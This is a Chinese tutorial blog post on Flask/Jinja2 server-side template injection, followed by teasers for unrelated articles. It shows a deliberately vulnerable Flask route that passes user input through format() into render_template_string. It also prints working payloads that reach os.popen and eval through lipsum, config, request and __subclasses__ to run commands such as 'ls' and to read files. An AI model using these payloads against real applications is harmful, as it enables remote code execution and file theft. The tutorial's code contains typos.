SSTI模版注入(初步)

news2024/12/30 3:56:51

SSTI模版注入(初步)

ssti可能造成任意文件读取和RCE远程控制后台系统

漏洞成因:渲染模版时,没有严格控制对用户的输入;

使用了危险的模版,导致用户可以混合flask程序进行交互。

flask是基于python开发的一种web服务器,那么也就意味着如果用户可以和flask进行交互的话,就可以执行python的代码,比如eval,system,file等等的函数

漏洞原理

from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/',methods = ['GET'])
def index():
    str = request.args.get('ben')
    html_str = '''
        <html>
        <head></head>
        <body>{{str}}</body>
        </html>
    '''
    return render_template_string(html_str,str_str)
if __name__=='__main__':
​
    app.debug = True
    app.run('127.0.0.1','8080')
#GET方式获取ben的值赋值给str
#str值通过render_template_string加载到body中间
#str是被{{}}包裹起来,会先预先渲染转义,然后才输出,不会被渲染执行(直接替换)
#只会获取str对应的字符串
#例如:127.0.0.1:8080/?ben={{5*5}}
#页面显示结果就是{{5*5}}
​
-----------------------------------------------------------------------------------------
​
from importlib,resources import contents
import time
from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/',methods = ['GET'])
def index():
    str = request.args.get('ben')
    html_str = '''
        <html>
        <head></head>
        <body>{{0}}</body>
        </html>
    '''.format(str)
    return render_template_string(html_str)
if __name__=='__main__':
​
    app.debug = True
    app.run('127.0.0.1','8080')
#str值通过format()函数填充到body中间
{}里可以定义任何参数
return render_template_string会把{}内的字符串当成代码指令
例如:127.0.0.1:8080/?ben={{7*7}}
{{7*7}}会被当做指令执行,页面显示结果是49

判断类型

{{7*7}}可用来检测漏洞

没有对提交的字符串进行足够严格的过滤,可能会当成代码指令执行

SSTI(Server-Side Template Injection)服务器端模版注入,实际上也是一种注入漏洞

实际上模板注入有很多种,这里主要是Python中的flask模版注入

这个图就是用来判断模版类型,第一个分支就是绿色代表的是执行即49,红色代表没有执行即{{7*7}}。

例如:

 

而mako中的是

种类有许多例如:Smarty, Mako, Jinjia2, Twig, Eval, Django, Flask, Go, Ruby, Tornado ……

魔术方法及利用模块

__class__ 查找当前类型的所有对象
__base__ 沿着父子类的关系往上走一个
__mro__  查找当前类对象的所有子类
__subclasses__() 查找父类下的所有子类
__init__ 查看类是否重载,重载是指程序在运行时就已经加载好了这个模块到内存中,如果出现wrapper的字眼,说明没有重载
__globals__ 函数会议字典的形式返回当前对象的全部全局变量
例子:
class A:pass    #这行代码定义了一个名为 A 的类。pass 是一个空语句,表示这个类没有任何属性或方法。
class B(A):pass #这行代码定义了一个名为 B 的类,它继承自类 A。这意味着 B 类将继承 A 类的所有属性和方                 法。pass 也表示这个类没有额外的属性或方法。
class C(B):pass
class D(B):pass
c= C()          #这行代码创建了 C 类的一个实例,并将其赋值给变量 c。此时,c 是一个 C 类的对象。由于 C                  继承了 B 和 A,所以 c 具有 B 和 A 中定义的所有属性和方法(虽然在这个例子中,A、B、                 C 这些类都没有定义任何属性或方法)。
​
print(c.__class__)          #<class'__main__.C'>         当前类C
print(c.__class__.__base__)   #<class'__main__.B'>      当前类C的父类B
print(c.__class__.__base__.__base__)  #<class '__main__.A'> 父类的父类
print(c.__class__.__base__.__base__.__base__)   #<class 'object'>
print(c.__class__.__mro__)   #<class'__main__.C'><class'__main__.B'><class'__main__.A'>                               <class'object'>           #罗列所有父类关系
print(c.__class__.__base__.__subclasses__())  #[<class'__main__.C'><class'__main__.D'>]
                                              #B下面的所有子类(数组形式)
print(c.__class__.__base__.__subclasses__()[1]) #<class'__main__.D'> (调用B中的D,下标从0开始)

文件读取

__class__            类的一个内置属性,表示实例对象的类。
​
__base__             类型对象的直接基类
​
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
​
__mro__              此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
​
__subclasses__()     返回这个类的子类集合,Each class keeps a list of weak references to its                      immediate subclasses. This method returns a list of all those                         references still alive. The list is in definition order.
​
__init__             初始化类,返回的类型是function
                     __init__其实就是看你要用的这个模块是否已经提前重载好了了。
​
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所                     有变量。
​
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
​
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作                     的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们                     同样可以直接通过这个方法来获取到实例、类、函数的属性。
​
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是
                     a.__getitem__('b')
​
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名                     称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与                              __builtin__的区别就不放了,百度都有。
                    __builtins__,这里就是先加载内嵌函数,然后再读内嵌函数里面的如eval等可利用的函                     数。
​
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,
                     __import__('os').popen('ls').read()
​
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
​
url_for              flask的一个方法,可以用于得到__builtins__,而且
                     url_for.__globals__['__builtins__']含有current_app。
​
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且                                              url_for.__globals__['__builtins__']含有current_app。
​
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模                     块:{{lipsum.__globals__['os'].popen('ls').read()}}
​
current_app          应用上下文,一个全局变量。
-----------------------------------------------------------------------------------------
request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open         函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
​
request.args.x1      get传参
​
request.values.x1    所有参数
​
request.cookies      cookies参数
​
request.headers      请求头参数
​
request.form.x1      post传参 (Content-Type:applicaation/x-www-form-urlencoded或
​
multipart/form-data)
​
request.data         post传参 (Content-Type:a/b)
​
request.json         post传json  (Content-Type: application/json)
​
config               当前application的所有配置。此外,也可以这样{{ 
​
config.__class__.__init__.__globals__['os'].popen('ls').read() }}
​
g                    {{g}}得到<flask.g of 'flask_ssti'>
​

常见过滤器
常用的过滤器
•
int():将值转换为int类型;
•
float():将值转换为float类型;
•
lower():将字符串转换为小写;
•
upper():将字符串转换为大写;
•
title():把值中的每个单词的首字母都转成大写;
•
capitalize():把变量值的首字母转成大写,其余字母转小写;
•
trim():截取字符串前面和后面的空白字符;
•
wordcount():计算一个长字符串中单词的个数;
•
reverse():字符串反转;
•
replace(value,old,new): 替换将old替换为new的字符串;
•
truncate(value,length=255,killwords=False):截取length长度的字符串;
•
striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;
•
escape()或e:转义字符,会将<、>等符号转义成HTML中的符号。显例:content|escape或content|e。
•
safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}};
•
list():将变量列成列表;
•
string():将变量转换成字符串;
•
join():将一个序列中的参数值拼接成字符串。示例看上面payload;
•
abs():返回一个数值的绝对值;
•
first():返回一个序列的第一个元素;
•
last():返回一个序列的最后一个元素;
•
format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!
•
length():返回一个序列或者字典的长度;
•
sum():返回列表内数值的和;
•
sort():返回排序后的列表;
•
default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。
•
length()返回字符串的长度,别名是count
​

常见注入模块

 

payload示例:

name={{"".__class__.__base__.__subclasses__()[117].__init__.__globals__.['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
​
#这里name要根据实际的传参的字符更改
#.__base__.的数量要一直找到object为止,所以这里也是要变化的

大致思路,具体问题具体分析

1.随便找一个内置类对象用class拿到他所对应的类 (逻辑:如果自身模块没有就调用父类模块下的其他子类) 2.用bases拿到基类(<class 'object'>) 3.用subclasses()拿到子类列表 4.在子类列表中直接寻找可以利用的类getshell

对象→类→基本类→子类→init方法→globals属性→builtins属性→eval函数

注意:['eval']后面的("python代码"),一定要有read()不然不会有回显

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2046055.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【C++高阶】哈希—— 位图 | 布隆过滤器 | 哈希切分

✨ 人生如梦&#xff0c;朝露夕花&#xff0c;宛若泡影 &#x1f30f; &#x1f4c3;个人主页&#xff1a;island1314 &#x1f525;个人专栏&#xff1a;C学习 ⛺️ 欢迎关注&#xff1a;&#x1f44d;点赞 &#x1f442;&am…

Ubuntu系统安装CH340驱动

今天在使用USB转UART模块连接设备时发现我的Ubuntu虚拟机无法识别USB设备&#xff0c;这个模块使用的CH340芯片&#xff0c;在Windows主机中可以识别到串口并连接&#xff0c;所以初步判断为虚拟机中缺少ch340驱动。实际上自Linux内核版本2.6.24起&#xff0c;Linux主线内核已内…

云原生-Docker安全-容器逃逸系统内核漏洞(解决docker.com无法访问)

云原生-Docker安全-容器逃逸&系统内核漏洞 细节部分在权限提升章节会详解&#xff0c;常用&#xff1a; CVE-2016-5195 CVE-2019-16884 CVE-2021-3493 CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222 云原生-Docker安全-容器逃逸&docker版本漏洞 CVE…

基于Java的医院急诊系统

TOC springboot327基于Java的医院急诊系统 第1章 绪论 1.1选题动因 当前的网络技术&#xff0c;软件技术等都具备成熟的理论基础&#xff0c;市场上也出现各种技术开发的软件&#xff0c;这些软件都被用于各个领域&#xff0c;包括生活和工作的领域。随着电脑和笔记本的广泛…

【中等】 猿人学web第一届 第7题 动态字体,随风漂移

文章目录 获取字体文件映射关系获取页面英雄排序python 代码 这道题是 动态字体文件加密&#xff0c;找出动态字体文件中对应数字相同规律即可 数据接口 https://match.yuanrenxue.cn/api/match/7 数据接口没有加密值 cookie字段也没有 获取字体文件映射关系 多次观察 字体文件…

2.2 Oracle与SQL Server简介

欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;欢迎订阅相关专栏&#xff1a; 工&#x1f497;重&#x1f497;hao&#x1f497;&#xff1a;野老杂谈 ⭐️ 全网最全IT互联网公司面试宝典&#xff1a;收集整理全网各大IT互联网公司技术、项目、HR面试真题.…

仿Muduo库实现高并发服务器——事件监控Poller模块

Poller模块在整个项目的使用 下面代码是对I/O复用接口函数的基本使用。 回顾上篇文章&#xff1a;事件监控管理模块 这个模块是将触发事件的描述符&#xff0c;给到外面&#xff0c;让外面去做对应的处理。 #define MAX_EPOLLEVENTS 1024 class Poller {private:int _epfd;s…

三级_网络技术_18_路由器的配置及使用

1.在Cisco路由器上用于永久保存路由器的开机诊断程序、引导程序和操作系统软件的存储器是()。 Flash NVRAM RAM ROM 2.在Cisco路由器中主要用来永久保存路由器的开机诊断程序、引导程序和操作系统&#xff0c;以完成路由器初始化进程的存储器是()。 RAM Disk Flash RO…

Linux平台使用OPUS对Audio PCM数据进行编解码

1&#xff09;Audio编解码入门级小知识&#xff0c;分享给将要学习或者正在学习Audio编解码开发的同学。 2&#xff09;内容属于原创&#xff0c;若转载&#xff0c;请说明出处。 3&#xff09;提供相关问题有偿答疑和支持。 Opus编码是一个开源的音频编码格式&#xff0c;具…

ArduPilot二次开发零基础教程

文章目录 前言一、概述二、开发环境搭建三、多旋翼MAVROS自主控制接口四、无人船&#xff08;车&#xff09;MAVROS自主控制接口五、二次开发基础六、控制LED灯七、自定义串口驱动八、Guided控制接口九、输出自定义PWM信号十、添加自定义MAVLINK消息和QGC通信十一、自定义日志十…

[MRCTF2020]套娃1

打开题目&#xff0c;查看源代码&#xff0c;有提示 有两层过滤 1.过滤"_"与"%5f" 。 这里要求的参数必须是"b_u_p_t"但是不能检测出"_"。这里看着很作弄人。其实这里要用到php里非法参数名的问题。可以参考一下博客 ?b.u.p.t2333…

探索Pandas的魔力:Python数据分析的终极武器

文章目录 探索Pandas的魔力&#xff1a;Python数据分析的终极武器背景&#xff1a;为何选择Pandas&#xff1f;引言&#xff1a;Pandas是什么&#xff1f;安装Pandas&#xff1a;一键安装的便捷基础函数&#xff1a;Pandas的五大法宝应用场景&#xff1a;Pandas的实战演练常见问…

浏览器调试工具-Chrome Dev Tools

浏览器调试模式下的各个调试工具是常用的工具集&#xff0c;能够帮助开发者理解、调试和优化网页。 1.打开方式 直接在浏览器中按下F12键右键点击页面上的任一元素&#xff0c;选择“检查”&#xff08;Inspect&#xff09;在浏览器右上角点击菜单按钮&#xff0c;选择“更多…

Redis:缓存击穿,缓存穿透,缓存雪崩

缓存穿透 缓存和数据库中都没有的数据&#xff0c;可用户还是源源不断的发起请求&#xff0c;导致每次请求都会到数据库&#xff0c;从而压垮数据库。 这将导致这个不存在的数据每次请求都要到存储层去查询&#xff0c;失去了缓存的意义。 *** 解决方案** 对空值进行缓存标…

音乐生成模型应用

重磅推荐专栏: 《大模型AIGC》 《课程大纲》 《知识星球》 本专栏致力于探索和讨论当今最前沿的技术趋势和应用领域,包括但不限于ChatGPT和Stable Diffusion等。我们将深入研究大型模型的开发和应用,以及与之相关的人工智能生成内容(AIGC)技术。通过深入的技术解析和实践经…

根据年月计算当月有哪几个周,及每周的起止日期

示例 传参数年、月&#xff0c;返回包含当月的所有周数、及周的起止日期&#xff0c;支持跨月 特殊情况请自行修改函数 console.log(getWeeksInMonth(2024, 9));返回如下 源码 源码以elementUI的周选择框的起止日期作为参考 function getWeeksInMonth(year, month) {// 计…

讲透一个强大算法模型,Transformer !!零基础入门到精通,收藏这一篇就够了

哈喽&#xff0c;我是cos大壮&#xff01;~ **首先&#xff0c;官话&#xff1a;**Transformer 模型是由 Vaswani 等人在 2017 年提出的一种新型神经网络架构&#xff0c;用于解决序列到序列的任务&#xff0c;比如机器翻译、文本生成等。它的核心思想是通过「注意力机制」来捕…

冷知识:编程第一人是位伟大的女性

冷门智慧&#xff1a;阿达编程先驱的传奇人生揭秘在线播放免费听 - 喜马拉雅手机版欢迎收听由主播壹道徽为您带来的“冷门智慧&#xff1a;阿达编程先驱的传奇人生揭秘”精彩有声内容&#xff0c;该音频时长5分18秒&#xff0c;已被收听1062次&#xff0c;用户嘎嘎呗嘎嘎评价说…

关于msvcp120.dll丢失的解决方法的详细步骤教程,一步步教你修复丢失错误

msvcp120.dll是一个动态链接库文件&#xff08;DLL&#xff09;&#xff0c;它是 Microsoft Visual C 2013 Redistributable 的一部分。这个文件对于运行使用 C 编写的多种Windows应用程序非常重要。以下解析将分为几个部分来详细探讨此文件的来源、功能、重要性及其可能遇到的…

暑期全新测评《黑神话悟空》显卡测试与录屏工具推荐:性能优化与屏幕捕捉技巧

随着《黑神话悟空》这款备受期待的游戏即将问世&#xff0c;玩家们不仅对游戏的画质和性能充满好奇&#xff0c;更希望能够记录下游戏中的每一个精彩瞬间。本文将为您提供一份全面的指南&#xff0c;不仅包括《黑神话悟空》在主流显卡上的帧数测试结果&#xff0c;画质选项的优…